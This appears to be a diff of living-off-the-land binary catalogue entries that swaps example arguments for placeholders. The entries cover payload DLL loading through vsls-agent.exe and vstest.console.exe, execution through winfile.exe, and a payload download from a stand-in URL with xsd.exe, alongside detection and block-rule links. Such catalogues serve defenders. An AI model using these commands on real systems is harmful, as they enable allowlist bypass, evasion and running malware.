- Path: C:\Windows\System32\wsl.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

@@ -4,7 +4,7 @@ Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
- Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
- Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}
Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute

@@ -4,7 +4,7 @@ Description: VSTest.Console.exe is the command-line tool to run tests
Author: Onat Uzunyayla
Created: 2023-09-08
Commands:
- Command: vstest.console.exe testcode.dll
- Command: vstest.console.exe {PATH:.dll}
Description: VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general
Usecase: Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe
Category: AWL Bypass
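Review bot: the Description context line reads "may allow an adversary to executes their malware"; correct "executes" to "execute" while the file is in this changeset.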

@@ -4,7 +4,7 @@ Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: winfile.exe calc.exe
- Command: winfile.exe {PATH:.exe}
Description: Execute an executable file with WinFile as a parent process.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute

@@ -4,7 +4,7 @@ Description: XML Schema Definition Tool included with the Windows Software Devel
Author: Avihay Eldad
Created: 2024-04-09
Commands:
- Command: xsd.exe http://example.com/payload
- Command: xsd.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache
Category: Download